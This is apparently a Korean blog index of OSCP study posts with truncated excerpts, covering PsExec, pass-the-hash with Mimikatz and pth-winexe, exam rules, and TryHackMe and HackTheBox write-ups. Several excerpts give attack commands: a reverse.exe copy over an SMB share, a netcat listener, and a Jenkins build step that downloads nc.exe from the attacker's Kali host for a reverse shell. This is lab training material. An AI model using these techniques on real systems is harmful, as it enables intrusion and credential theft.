OSCP 97

psexec, winexe(linux버전)

PSExec 유틸리티는 원격 시스템에 몇 가지 사항이 필요합니다. SMB (서버 메시지 블록) 서비스를 사용할 수 있고 연결할 수 있어야합니다 (예 : 방화벽에 의해 차단되지 않아야 함). 파일 및 인쇄 공유를 활성화해야합니다. 및 단순 파일 공유를 비활성화해야합니다. Admin$ 공유가 사용 가능하고 액세스 가능해야합니다. Windows 디렉터리에 매핑되는 숨겨진 SMB 공유는 소프트웨어 배포를위한 것입니다. PSExec 유틸리티에 제공된 자격 증명에는 Admin$ 공유에 액세스 할 수있는 권한이 있어야합니다. PSExec에는 실행 파일 내에 Windows 서비스 이미지가 있습니다. 이 서비스를 가져와 원격 시스템의 Admin$ 공유에 배포합니다. 그런 다음 SMB를 통한 DCE / RPC 인터페이스를..

Passing the Hash: How to hack Windows Server 2012 - Privilege Escalation to Domain Admin

Passing the Hash: How to hack Windows Server 2012 - Privilege Escalation to Domain Admin www.youtube.com/watch?v=SpLMuVs-qoc Tool: remmina: rdesktop과 동일, 윈도우 원격접속도구 MimiKatz: 메모리에 저장된 ntlm Hash값을 덤프 할 수 있다. * pth기법을 위해 NTLM HASH가 필요한 것이기 때문에 다른 해시덤프 도구를 사용해도 된다. WCE, fdump 등.. pth-winexe: ntlm 해쉬값을 가지고 원격 도메인 서버에 대한 접근 및 로그인, 명령어를 수행할 수 있다. windows2012부터는 credential을 평문으로 저장하지 않는다. (2008, 2003은 ..

[OSCP EXAM GUIDE] SECTION 3: SUBMISSION INSTRUCTIONS

Submission Checklist: Your exam report is in PDF format Your PDF has been archived into a password-protected .7z file You used your OSID as part of the name of your .7z file You have uploaded your .7z file to https://upload.offsec.com You have emailed the link from the upload page to "oscp AT offensive-security DOT com" Submission Format and Name 시험 보고서는 PDF 형식으로 제출해야합니다. 다른 형식은 허용되지 않습니다. 다른 형식..

OSCP/시험대비 2020.07.06

[OSCP EXAM GUIDE] SECTION 2: EXAM INFORMATION

Exam Connection 시험 시작전 exam vpn파일을 메일로 보내주니까 미리 연결을 테스트해라. Exam Control Panel Exam Control Panel은 시험 이메일에 제공된 링크를 통해 제공됩니다. Exam Control Panel을 통해 다음을 수행 할 수 있습니다. Submit proof files Revert target machines View specific target objectives and point values Machine Reverts 당신은 24번의 revert제한이 있습니다. 이 한도는 시험 중에 한 번 reset 할 수 있습니다. 시험이 시작될 때 모든 기계가 새로 revert되었으므로 시작할 때 기계를 되돌릴 필요가 없습니다. 기계가 revert 될 때..

OSCP/시험대비 2020.07.01

[Windows] Windows PrivEsc Arena

Windows PrivEsc Arena tryhackme.com/room/windowsprivescarena - 원인에 대한 분석이나 구체적 설명이 없음... - 정말 실습용, 나중에 winPEAS 결과물 보고 참고하는 것이 좋을 듯 Registry Escalation - Autorun Registry Escalation - AlwaysInstallElevated Service Escalation - Registry Privilege Escalation - Startup Applications Service Escalation - DLL Hijacking Service Escalation - binPath Service Escalation - Unquoted Service Paths Potato Esca..

OSCP/TryHackMe 2020.06.14

명령어 정리2

sed 치환 명령어 빈칸을 제거함 sed 's/ //g' id_rsa> rsa Windows-Kali smbserver 파일전송 칼리 python /tools/tmp/impacket/examples/smbserver.py kali . 타겟 copy \칼리IP\kali\reverse.exe C:\PrivEsc\reverse.exe winexec, psexec (칼리에서 원격 cmd 실행) winexec -U 사용자%암호 //아이피 cmd Enumeration MSRPC & LDAP(Credential을 가지고 있어야 깊게 진행 가능..) msrpc root@kali:/HTB/Sauna# rpcdump.py 10.10.10.175 -p 135 ldap nmap brute 제외하고 ldap 관련 스크립트 모두..

OSCP/시험대비 2020.06.12

[Windows] Jeeves

Jeeves - 커널 권한상승 X (exploit 검색은 셜록이 제일 좋은 듯) - 키파일 찾아서 passthehash로 로그인 - dirb 브루트포스 포트: 80, 50000 Jenkins 페이지 /askjeeves - 딕셔너리에 단어가 없다면 cewl로 단어 추출해야함 - build 또는 scriptconsole로 커맨드 원격실행 nc -e 옵션 2020 칼리에 있는 nc의 경우 -e (쉘 실행)옵션이 설정이 필요함.. 잰킨스 build(windows batch command) kali: nc -lnvp 5555 잰킨스 build(windows batch command) Jenkins: powershell Invoke-WebRequest -Uri [kali ip]/nc.exe -Outfile nc.e..

OSCP/HackTheBox 2020.06.11